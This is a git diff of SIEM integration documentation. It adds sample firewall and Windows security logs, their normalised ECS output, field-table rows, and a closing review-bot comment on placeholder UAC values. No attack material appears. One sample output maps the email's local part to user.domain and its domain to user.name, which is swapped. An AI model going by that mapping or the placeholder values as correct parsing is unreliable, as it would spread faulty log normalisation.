"Threat_ContentType": "url", + "VirtualLocation": "vsys", + "VirtualSystemName": "VSYS" + }, + "related": { + "hosts": [ + "www.sekoia.io" + ], + "ip": [ + "0.0.0.0", + "10.0.0.2", + "192.168.0.1" + ] + }, + "rule": { + "name": "rule-internet", + "uuid": "ea3431a2-6869-4d9f-ad41-1858d80b406c" + }, + "source": { + "address": "10.0.0.2", + "ip": "10.0.0.2", + "nat": { + "ip": "0.0.0.0", + "port": 0 + }, + "port": 49802 + }, + "url": { + "domain": "www.sekoia.io", + "path": "catalog/integrations", + "port": 443, + "query": "query=this", + "registered_domain": "sekoia.io", + "subdomain": "www", + "top_level_domain": "io" + }, + "user_agent": { + "name": "Mozilla/4.0 (compatible; ms-office; MSOffice 16)" + } + } + + ``` + + === "threat_cef.json" ```json @@ -3100,6 +3487,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ] }, "@timestamp": "2021-03-01T20:48:21Z", + "action": { + "type": "spyware" + }, "destination": { "geo": { "country_iso_code": "BR" @@ -3218,7 +3608,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I { "message": "1,2021/08/31 14:00:02,001701000000,THREAT,vulnerability,2049,2021/08/31 14:00:02,10.0.0.2,10.2.0.1,0.0.0.0,0.0.0.0,abcd,,,web-browsing,vsys,env,zone2,a1.1,aec.2,podl,2021/08/31 14:00:02,279429,2,12345,80,0,0,0x2000,tcp,alert,\"EXAMPLE.PDF\",PDF Exploit Evasion Found(34805),any,informational,server-to-client,1320000,0x2000000000000000,10.0.0.0-10.255.255.255,10.0.0.0-10.255.255.255,0,,0,,,1,,,,,,,,0,0,0,0,0,,FW,,,,,0,,0,,N/A,code-execution,AppThreat-0000-1111,0x0,0,422342342,", "event": { - "action": "code-execution", + "action": "alert", "category": [ "vulnerability" ], @@ -3318,6 +3708,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ] }, "@timestamp": "2022-07-31T12:46:24Z", + "action": { + "type": "end" + }, "destination": { "address": "5.6.7.8", "bytes": 5651, 
@@ -3426,6 +3819,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ] }, "@timestamp": "2022-08-02T06:42:20Z", + "action": { + "type": "end" + }, "destination": { "address": "1.1.1.1", "bytes": 2755, @@ -3538,6 +3934,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ] }, "@timestamp": "2021-02-27T20:16:21Z", + "action": { + "type": "end" + }, "destination": { "address": "1.1.1.1", "bytes": 400448, @@ -3669,6 +4068,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I { "message": "1,2024/01/03 13:15:29,026701002040,TRAFFIC,end,2816,2024/01/03 13:15:29,1.2.3.4,5.6.7.8,0.0.0.0,0.0.0.0,MyRule,,,ssl,vsys1,Z_DMZ_PROXY,Z_INTERCO_WAN,ethernet1/22.301,ethernet1/3.104,Log Profile,2024/01/03 13:15:29,219781,1,60975,443,0,0,0x41c,tcp,allow,5773,758,5015,14,2024/01/03 13:15:14,0,not-resolved,,7312415129244589397,0x0,10.0.0.0-10.255.255.255,United States,,7,7,tcp-fin,0,0,0,0,,PA2314-CD,from-policy,,,0,,0,,N/A,0,0,0,0,0bbe5a53-f498-4cc2-a170-ced134f4824c,0,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,2024-01-03T13:15:30.547+01:00,,,encrypted-tunnel,networking,browser-based,4,\\\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\\\",,ssl,no,no,0,NonProxyTraffic,", "event": { + "action": "allow", "category": [ "network" ], @@ -3751,6 +4151,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I { "message": "<14>Sep 16 10:00:00 PA 1,9/16/19 10:00,1801017000,TRAFFIC,deny,2049,9/16/19 10:00,10.0.0.2,1.2.3.4,5.4.4.3,5.4.3.2,DENYALL,,,protection,vsys1,DNS,AAAAA,ae2.503,ethernet1/1,Secure,9/16/19 10:00,11111,1,130000,53,6379,53,0x400000,udp,reset-both,284,284,0,1,9/16/19 10:00,0,any,0,50660381851,0x0,10.0.0.0-10.255.255.255,Spain,0,1,0,policy-deny,0,0,0,0,,PA-1,from-application,,,0,,0,,N/A,0,0,0,0", "event": { + "action": "reset-both", "category": [ "network" ], 
@@ -3846,6 +4247,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ] }, "@timestamp": "2021-03-01T20:48:21Z", + "action": { + "type": "url" + }, "destination": { "address": "1.1.1.1", "geo": { @@ -3979,6 +4383,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ] }, "@timestamp": "2021-03-01T21:06:02Z", + "action": { + "type": "logout" + }, "destination": { "address": "1.1.1.1", "ip": "1.1.1.1", 
@@ -4044,6 +4451,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I { "message": "{\"TimeReceived\":\"2023-05-30T06:54:42.000000Z\",\"DeviceSN\":\"111111111111\",\"LogType\":\"THREAT\",\"Subtype\":\"wildfire\",\"ConfigVersion\":\"10.1\",\"TimeGenerated\":\"2023-05-30T06:52:13.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"Normal Internet Access browser\",\"SourceUser\":\"john.doe@example.org\",\"DestinationUser\":null,\"Application\":\"web-browsing\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"Trust\",\"ToZone\":\"Untrust\",\"InboundInterface\":\"ethernet1/20\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Panorama_CDL\",\"SessionID\":444444,\"RepeatCount\":1,\"SourcePort\":55555,\"DestinationPort\":80,\"NATSourcePort\":40114,\"NATDestinationPort\":80,\"Protocol\":\"tcp\",\"Action\":\"block\",\"FileName\":\"mp3.exe\",\"ThreatID\":\"Windows Executable (EXE)(52020)\",\"VendorSeverity\":\"Informational\",\"DirectionOfAttack\":\"server to 
client\",\"SequenceNo\":7117268851537282868,\"SourceLocation\":\"10.0.0.0-10.255.255.255\",\"DestinationLocation\":\"CN\",\"PacketID\":0,\"FileHash\":\"adc83b19e793491b1c6ea0fd8b46cd9f32e592fc\",\"ApplianceOrCloud\":\"wildfire.paloaltonetworks.com\\u0000\",\"URLCounter\":1,\"FileType\":\"pe\",\"SenderEmail\":null,\"EmailSubject\":null,\"RecipientEmail\":null,\"ReportID\":33333333333,\"DGHierarchyLevel1\":997,\"DGHierarchyLevel2\":738,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"MyDevice\",\"SourceUUID\":null,\"DestinationUUID\":null,\"IMSI\":0,\"IMEI\":null,\"ParentSessionID\":0,\"ParentStarttime\":\"1970-01-01T00:00:00.000000Z\",\"Tunnel\":\"N/A\",\"ThreatCategory\":\"unknown\",\"ContentVersion\":\"0\",\"SigFlags\":\"0x0\",\"RuleUUID\":\"50afdf91-0d37-4729-8052-1382912d9895\",\"HTTP2Connection\":0,\"DynamicUserGroupName\":null,\"X-Forwarded-ForIP\":null,\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"HostID\":null,\"EndpointSerialNumber\":\"xxxxxxxxxxx\",\"DomainEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"PartialHash\":0,\"TimeGeneratedHighResolution\":\"2023-05-30T06:52:14.052000Z\",\"NSSAINetworkSliceType\":null}\n", "event": { + "action": "block", "category": [ "malware" ], 
@@ -4066,6 +4474,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "ip": "5.6.7.8", "nat": { + "ip": "8.7.6.5", "port": 80 }, "port": 80 @@ -4115,9 +4524,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "related": { "ip": [ "1.2.3.4", - "5.6.7.8" + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" ], "user": [ + "example.org", "john.doe@example.org" ] }, @@ -4129,6 +4541,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "address": "1.2.3.4", "ip": "1.2.3.4", "nat": { + "ip": "4.3.2.1", "port": 40114 }, "port": 55555, @@ -4137,7 +4550,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I } }, "user": { - "name": "john.doe@example.org" + "domain": "john.doe", + "email": "john.doe@example.org", + "name": "example.org" } } @@ -4165,6 +4580,7 @@ The following table lists the fields that are extracted, normalized under the EC |`destination.nat.port` | `long` | Destination NAT Port | |`destination.packets` | `long` | Packets sent from the destination to the source. | |`destination.port` | `long` | Port of the destination. | +|`destination.user.domain` | `keyword` | Name of the directory the user is a member of. | |`destination.user.name` | `keyword` | Short name or login of the user. | |`email.from.address` | `keyword` | Email address from | |`email.subject` | `keyword` | Subject | 
@@ -4195,6 +4611,7 @@ The following table lists the fields that are extracted, normalized under the EC |`log.logger` | `keyword` | Name of the logger. | |`network.application` | `keyword` | Application level protocol name. | |`network.bytes` | `long` | Total bytes transferred in both directions. | +|`network.forwarded_ip` | `ip` | Host IP address when the source IP address is the proxy. | |`network.packets` | `long` | Total packets transferred in both directions. | |`network.protocol` | `keyword` | Application protocol name. | |`network.transport` | `keyword` | Protocol Name corresponding to the field `iana_number`. | @@ -4226,7 +4643,15 @@ The following table lists the fields that are extracted, normalized under the EC |`source.nat.port` | `long` | Source NAT port | |`source.packets` | `long` | Packets sent from the source to the destination. | |`source.port` | `long` | Port of the source. | +|`source.user.domain` | `keyword` | Name of the directory the user is a member of. | |`source.user.name` | `keyword` | Short name or login of the user. | +|`url.domain` | `keyword` | Domain of the url. | +|`url.original` | `wildcard` | Unmodified original url as seen in the event source. | +|`url.path` | `wildcard` | Path of the request, such as "/search". | +|`url.port` | `long` | Port of the request, such as 443. | +|`url.query` | `keyword` | Query string of the request. | +|`user.domain` | `keyword` | Name of the directory the user is a member of. | +|`user.email` | `keyword` | User email address. | |`user.name` | `keyword` | Short name or login of the user. | |`user_agent.name` | `keyword` | Name of the user agent. | |`user_agent.os.name` | `keyword` | Operating system name, without the version. | diff --git a/_shared_content/operations_center/integrations/generated/903ec1b8-f206-4ba5-8563-db21da09cafd_sample.md b/_shared_content/operations_center/integrations/generated/903ec1b8-f206-4ba5-8563-db21da09cafd_sample.md index 0a12572b3a..db40769711 100644 
--- a/_shared_content/operations_center/integrations/generated/903ec1b8-f206-4ba5-8563-db21da09cafd_sample.md +++ b/_shared_content/operations_center/integrations/generated/903ec1b8-f206-4ba5-8563-db21da09cafd_sample.md 
@@ -122,6 +122,208 @@ In this section, you will find examples of raw logs as generated natively by the +=== "network_threat_alert_1" + + + ```json + { + "TimeReceived": "2024-06-25T21:32:54.000000Z", + "DeviceSN": "000011111112222", + "LogType": "THREAT", + "Subtype": "url", + "ConfigVersion": "10.2", + "TimeGenerated": "2024-06-25T21:30:00.000000Z", + "SourceAddress": "1.2.3.4", + "DestinationAddress": "5.6.7.8", + "NATSource": "4.3.2.1", + "NATDestination": "8.7.6.5", + "Rule": "Rule124", + "SourceUser": null, + "DestinationUser": null, + "Application": "ssl", + "VirtualLocation": "vsys1", + "FromZone": "INSIDE", + "ToZone": "OUTSIDE", + "InboundInterface": "ethernet1/2", + "OutboundInterface": "ethernet1/1", + "LogSetting": "Panorama_CDL", + "SessionID": 155600, + "RepeatCount": 1, + "SourcePort": 51501, + "DestinationPort": 443, + "NATSourcePort": 63989, + "NATDestinationPort": 443, + "Protocol": "tcp", + "Action": "alert", + "URL": "www.example.org", + "URLCategory": "computer-and-internet-info", + "VendorSeverity": "Informational", + "DirectionOfAttack": "client to server", + "SequenceNo": 7353954110769176067, + "SourceLocation": "AZURE-EU-WEST-CBS-BELLEM", + "DestinationLocation": "NL", + "ContentType": null, + "PacketID": 0, + "URLCounter": 0, + "UserAgent": null, + "X-Forwarded-For": null, + "Referer": null, + "DGHierarchyLevel1": 982, + "DGHierarchyLevel2": 117, + "DGHierarchyLevel3": 0, + "DGHierarchyLevel4": 0, + "VirtualSystemName": "", + "DeviceName": "DN-EUWEST-F2", + "SourceUUID": null, + "DestinationUUID": null, + "HTTPMethod": "unknown", + "IMSI": 0, + "IMEI": null, + "ParentSessionID": 0, + "ParentStarttime": "1970-01-01T00:00:00.000000Z", + "Tunnel": "N/A", + "InlineMLVerdict": "unknown", + "ContentVersion": "0", + "SigFlags": 0, + "HTTPHeaders": null, + "URLCategoryList": "computer-and-internet-info,low-risk", + "RuleUUID": "cbc3bd5d-e54c-48d7-a6c7-8710bf593e7c", + "HTTP2Connection": 0, + "DynamicUserGroupName": null, + "X-Forwarded-ForIP": 
null, + "SourceDeviceCategory": null, + "SourceDeviceProfile": null, + "SourceDeviceModel": null, + "SourceDeviceVendor": null, + "SourceDeviceOSFamily": null, + "SourceDeviceOSVersion": null, + "SourceDeviceHost": null, + "SourceDeviceMac": null, + "DestinationDeviceCategory": null, + "DestinationDeviceProfile": null, + "DestinationDeviceModel": null, + "DestinationDeviceVendor": null, + "DestinationDeviceOSFamily": null, + "DestinationDeviceOSVersion": null, + "DestinationDeviceHost": null, + "DestinationDeviceMac": null, + "ContainerID": null, + "ContainerNameSpace": null, + "ContainerName": null, + "SourceEDL": null, + "DestinationEDL": null, + "HostID": null, + "EndpointSerialNumber": null, + "SourceDynamicAddressGroup": null, + "DestinationDynamicAddressGroup": null, + "TimeGeneratedHighResolution": "2024-06-25T21:30:00.103000Z", + "NSSAINetworkSliceType": null + } + ``` + + + +=== "network_threat_alert_2" + + + ```json + { + "TimeReceived": "2024-06-25T21:30:08.000000Z", + "DeviceSN": "no-serial", + "LogType": "THREAT", + "Subtype": "url", + "ConfigVersion": "10.2", + "TimeGenerated": "2024-06-25T21:30:00.000000Z", + "SourceAddress": "1.2.3.4", + "DestinationAddress": "5.6.7.8", + "NATSource": "4.3.2.1", + "NATDestination": "8.7.6.5", + "Rule": "Global_Internet_Network_Awareness_Service", + "SourceUser": "jdoe@example.org", + "DestinationUser": null, + "Application": "web-browsing", + "VirtualLocation": "vsys1", + "FromZone": "ZR-EUWS-1", + "ToZone": "untrust", + "InboundInterface": "tunnel.107", + "OutboundInterface": "ethernet1/1", + "LogSetting": "default", + "SessionID": 1787364, + "RepeatCount": 1, + "SourcePort": 53610, + "DestinationPort": 80, + "NATSourcePort": 36160, + "NATDestinationPort": 80, + "Protocol": "tcp", + "Action": "alert", + "URL": "www.example.com/connecttest.txt", + "URLCategory": "computer-and-internet-info", + "VendorSeverity": "Informational", + "DirectionOfAttack": "client to server", + "SequenceNo": 7372845116442397960, + 
"SourceLocation": "10.0.0.0-10.255.255.255", + "DestinationLocation": "US", + "ContentType": "text/plain", + "PacketID": 0, + "URLCounter": 1, + "UserAgent": "Microsoft NCSI", + "X-Forwarded-For": null, + "Referer": null, + "DGHierarchyLevel1": 463, + "DGHierarchyLevel2": 525, + "DGHierarchyLevel3": 0, + "DGHierarchyLevel4": 0, + "VirtualSystemName": "", + "DeviceName": "ZR-EUWS-1", + "SourceUUID": null, + "DestinationUUID": null, + "HTTPMethod": "get", + "IMSI": 0, + "IMEI": null, + "ParentSessionID": 0, + "ParentStarttime": "1970-01-01T00:00:00.000000Z", + "Tunnel": "N/A", + "InlineMLVerdict": "unknown", + "ContentVersion": "0", + "SigFlags": 0, + "HTTPHeaders": null, + "URLCategoryList": ".msftconnecttest.com,computer-and-internet-info,low-risk", + "RuleUUID": "481a523a-44c0-4c37-b2d5-b6b541d775c3", + "HTTP2Connection": 0, + "DynamicUserGroupName": null, + "X-Forwarded-ForIP": null, + "SourceDeviceCategory": null, + "SourceDeviceProfile": null, + "SourceDeviceModel": null, + "SourceDeviceVendor": null, + "SourceDeviceOSFamily": null, + "SourceDeviceOSVersion": null, + "SourceDeviceHost": null, + "SourceDeviceMac": null, + "DestinationDeviceCategory": null, + "DestinationDeviceProfile": null, + "DestinationDeviceModel": null, + "DestinationDeviceVendor": null, + "DestinationDeviceOSFamily": null, + "DestinationDeviceOSVersion": null, + "DestinationDeviceHost": null, + "DestinationDeviceMac": null, + "ContainerID": null, + "ContainerNameSpace": null, + "ContainerName": null, + "SourceEDL": null, + "DestinationEDL": null, + "HostID": null, + "EndpointSerialNumber": null, + "SourceDynamicAddressGroup": null, + "DestinationDynamicAddressGroup": null, + "TimeGeneratedHighResolution": "2024-06-25T21:30:00.778000Z", + "NSSAINetworkSliceType": null + } + ``` + + + === "sctp_cef" 
@@ -1255,6 +1457,15 @@ In this section, you will find examples of raw logs as generated natively by the +=== "threat-url-xff" + + + ```json + 1,2024/03/12 15:02:32,016401004874,THREAT,url,2816,2024/03/12 15:02:32,10.0.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule-internet,x-fwd-for: 11.22.33.44,,web-browsing,vsys,env,zone2,a1.1,aec.2,default,2024/03/12 15:02:32,1384927,1,49802,80,0,0,0x8b000,tcp,alert,"www.sekoia.io:443/catalog/integrations?query=this",(9999),any,informational,client-to-server,7324220311048193508,0x0,10.0.0.0-10.255.255.255,192.168.0.0-192.168.255.255,,,0,,,10,Mozilla/4.0 (compatible; ms-office; MSOffice 16),,"11.22.33.44",,,,,0,0,0,0,0,VSYS,FW,,,,get,0,,0,,N/A,N/A,AppThreat-0-0,0x0,0,4294967295,,"Sekoia,cybertech,low-risk",ea3431a2-6869-4d9f-ad41-1858d80b406c,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,2024-03-12T15:02:32.650+01:00,,,,internet-utility,general-internet,browser-based,4,"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use",,web-browsing,no,no,,,NonProxyTraffic + ``` + + + === "threat_cef" diff --git a/_shared_content/operations_center/integrations/generated/9044ba46-2b5d-4ebd-878a-51d62e84c8df.md b/_shared_content/operations_center/integrations/generated/9044ba46-2b5d-4ebd-878a-51d62e84c8df.md index 5409a04cfd..c96eff10a7 100644 --- a/_shared_content/operations_center/integrations/generated/9044ba46-2b5d-4ebd-878a-51d62e84c8df.md +++ b/_shared_content/operations_center/integrations/generated/9044ba46-2b5d-4ebd-878a-51d62e84c8df.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "ack.json" diff --git a/_shared_content/operations_center/integrations/generated/916c13a8-c109-49f0-94db-d6a2300f5580.md b/_shared_content/operations_center/integrations/generated/916c13a8-c109-49f0-94db-d6a2300f5580.md index f543c854b7..6f58723739 100644 --- a/_shared_content/operations_center/integrations/generated/916c13a8-c109-49f0-94db-d6a2300f5580.md +++ b/_shared_content/operations_center/integrations/generated/916c13a8-c109-49f0-94db-d6a2300f5580.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_sample.json" diff --git a/_shared_content/operations_center/integrations/generated/9281438c-f7c3-4001-9bcc-45fd108ba1be.md b/_shared_content/operations_center/integrations/generated/9281438c-f7c3-4001-9bcc-45fd108ba1be.md index ea3de8b026..8af1c56fc1 100644 --- a/_shared_content/operations_center/integrations/generated/9281438c-f7c3-4001-9bcc-45fd108ba1be.md +++ b/_shared_content/operations_center/integrations/generated/9281438c-f7c3-4001-9bcc-45fd108ba1be.md 
@@ -30,7 +30,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "Event_1117.json" 
@@ -691,6 +691,93 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "Event_4738.json" + + ```json + + { + "message": "{\n \"EventTime\": \"2024-05-06 11:38:15\",\n \"Hostname\": \"server01.example.org\",\n \"Keywords\": -9214364837600034816,\n \"EventType\": \"AUDIT_SUCCESS\",\n \"SeverityValue\": 2,\n \"Severity\": \"INFO\",\n \"EventID\": 4738,\n \"SourceName\": \"Microsoft-Windows-Security-Auditing\",\n \"ProviderGuid\": \"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\n \"Version\": 0,\n \"Task\": 13824,\n \"OpcodeValue\": 0,\n \"RecordNumber\": 105098604,\n \"ProcessID\": 688,\n \"ThreadID\": 2676,\n \"Channel\": \"Security\",\n \"Message\": \"A user account was changed.\\r\\n\\r\\nSubject:\\r\\n\\tSecurity ID:\\t\\tS-1-5-7\\r\\n\\tAccount Name:\\t\\tANONYMOUS LOGON\\r\\n\\tAccount Domain:\\t\\tNT AUTHORITY\\r\\n\\tLogon ID:\\t\\t0x3E6\\r\\n\\r\\nTarget Account:\\r\\n\\tSecurity ID:\\t\\tS-1-5-21-1111111111-222222222-444444444-55555\\r\\n\\tAccount Name:\\t\\tjdoe\\r\\n\\tAccount Domain:\\t\\tEXAMPLE\\r\\n\\r\\nChanged Attributes:\\r\\n\\tSAM Account Name:\\t-\\r\\n\\tDisplay Name:\\t\\t-\\r\\n\\tUser Principal Name:\\t-\\r\\n\\tHome Directory:\\t\\t-\\r\\n\\tHome Drive:\\t\\t-\\r\\n\\tScript Path:\\t\\t-\\r\\n\\tProfile Path:\\t\\t-\\r\\n\\tUser Workstations:\\t-\\r\\n\\tPassword Last Set:\\t06.05.2024 11:38:15\\r\\n\\tAccount Expires:\\t\\t-\\r\\n\\tPrimary Group ID:\\t-\\r\\n\\tAllowedToDelegateTo:\\t-\\r\\n\\tOld UAC Value:\\t\\t-\\r\\n\\tNew UAC Value:\\t\\t-\\r\\n\\tUser Account Control:\\t-\\r\\n\\tUser Parameters:\\t-\\r\\n\\tSID History:\\t\\t-\\r\\n\\tLogon Hours:\\t\\t-\\r\\n\\r\\nAdditional Information:\\r\\n\\tPrivileges:\\t\\t-\",\n \"Category\": \"User Account Management\",\n \"Opcode\": \"Info\",\n \"Dummy\": \"-\",\n \"TargetUserName\": \"jdoe\",\n \"TargetDomainName\": \"EXAMPLE\",\n \"TargetSid\": \"S-1-5-21-1111111111-222222222-444444444-55555\",\n \"SubjectUserSid\": \"S-1-5-7\",\n \"SubjectUserName\": 
\"ANONYMOUS LOGON\",\n \"SubjectDomainName\": \"NT AUTHORITY\",\n \"SubjectLogonId\": \"0x3e6\",\n \"PrivilegeList\": \"-\",\n \"SamAccountName\": \"-\",\n \"DisplayName\": \"-\",\n \"UserPrincipalName\": \"-\",\n \"HomeDirectory\": \"-\",\n \"HomePath\": \"-\",\n \"ScriptPath\": \"-\",\n \"ProfilePath\": \"-\",\n \"UserWorkstations\": \"-\",\n \"PasswordLastSet\": \"06.05.2024 11:38:15\",\n \"AccountExpires\": \"-\",\n \"PrimaryGroupId\": \"-\",\n \"AllowedToDelegateTo\": \"-\",\n \"OldUacValue\": \"321\",\n \"NewUacValue\": \"123\",\n \"UserAccountControl\": \"-\",\n \"UserParameters\": \"-\",\n \"SidHistory\": \"-\",\n \"LogonHours\": \"-\",\n \"EventReceivedTime\": \"2024-05-06 11:38:16\",\n \"SourceModuleName\": \"SecurityLog\",\n \"SourceModuleType\": \"im_msvistalog\"\n}", + "event": { + "code": "4738", + "message": "A user account was changed.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-7\r\n\tAccount Name:\t\tANONYMOUS LOGON\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E6\r\n\r\nTarget Account:\r\n\tSecurity ID:\t\tS-1-5-21-1111111111-222222222-444444444-55555\r\n\tAccount Name:\t\tjdoe\r\n\tAccount Domain:\t\tEXAMPLE\r\n\r\nChanged Attributes:\r\n\tSAM Account Name:\t-\r\n\tDisplay Name:\t\t-\r\n\tUser Principal Name:\t-\r\n\tHome Directory:\t\t-\r\n\tHome Drive:\t\t-\r\n\tScript Path:\t\t-\r\n\tProfile Path:\t\t-\r\n\tUser Workstations:\t-\r\n\tPassword Last Set:\t06.05.2024 11:38:15\r\n\tAccount Expires:\t\t-\r\n\tPrimary Group ID:\t-\r\n\tAllowedToDelegateTo:\t-\r\n\tOld UAC Value:\t\t-\r\n\tNew UAC Value:\t\t-\r\n\tUser Account Control:\t-\r\n\tUser Parameters:\t-\r\n\tSID History:\t\t-\r\n\tLogon Hours:\t\t-\r\n\r\nAdditional Information:\r\n\tPrivileges:\t\t-", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "action": { + "id": 4738, + "name": "A user account was changed", + "outcome": "success", + "properties": { + "AllowedToDelegateTo": "-", + "Category": "User Account Management", + "DisplayName": 
"-", + "EventType": "AUDIT_SUCCESS", + "HomeDirectory": "-", + "Keywords": "-9214364837600034816", + "NewUAC": "123", + "OldUAC": "321", + "OpcodeValue": 0, + "PrivilegeList": "-", + "ProviderGuid": "{54849625-5478-4994-A5BA-3E3B0328C30D}", + "SamAccountName": "-", + "ScriptPath": "-", + "Severity": "INFO", + "SidHistory": "-", + "SourceName": "Microsoft-Windows-Security-Auditing", + "SubjectDomainName": "NT AUTHORITY", + "SubjectLogonId": "0x3e6", + "SubjectUserName": "ANONYMOUS LOGON", + "SubjectUserSid": "S-1-5-7", + "TargetDomainName": "EXAMPLE", + "TargetSid": "S-1-5-21-1111111111-222222222-444444444-55555", + "TargetUserName": "jdoe", + "Task": 13824, + "UserPrincipalName": "-" + }, + "record_id": 105098604, + "type": "Security" + }, + "host": { + "hostname": "server01.example.org", + "name": "server01.example.org" + }, + "log": { + "hostname": "server01.example.org", + "level": "info" + }, + "os": { + "family": "windows", + "platform": "windows" + }, + "process": { + "id": 688, + "pid": 688, + "thread": { + "id": 2676 + } + }, + "related": { + "hosts": [ + "server01.example.org" + ], + "user": [ + "ANONYMOUS LOGON" + ] + }, + "user": { + "domain": "NT AUTHORITY", + "id": "S-1-5-7", + "name": "ANONYMOUS LOGON", + "target": { + "domain": "EXAMPLE", + "name": "jdoe" + } + } + } + + ``` + + === "Event_4768.json" ```json @@ -830,10 +917,17 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "hosts": [ "HOSTFOO" ], + "ip": [ + "1.1.1.1" + ], "user": [ "USERFOO" ] }, + "source": { + "address": "1.1.1.1", + "ip": "1.1.1.1" + }, "user": { "domain": "HOSTFOO", "name": "USERFOO" 
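Review bot: The UAC values in the Event_4738.json sample are inconsistent and do not look like real data: the raw `"OldUacValue": "321"` / `"NewUacValue": "123"` are mapped to `action.properties.OldUAC` / `NewUAC`, while the same event's `Message` shows `Old UAC Value: -` and `New UAC Value: -`, and the @@ -4335 hunk later in this patch shows the same properties as hex (`"NewUAC": "0x15"`, `"OldUAC": "0x0"`). Detection rules for account-control changes decode the UAC bits from the hex value, so this sample should be regenerated from an actual 4738 event so the parser is exercised on the production format. Also, `TargetSid` is present in the raw log but the output only sets `user.target.domain` and `user.target.name`; since `user.id` is filled from `SubjectUserSid`, filling `user.target.id` from `TargetSid` would keep the subject/target mapping symmetric and give rules a SID pivot for the modified account.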
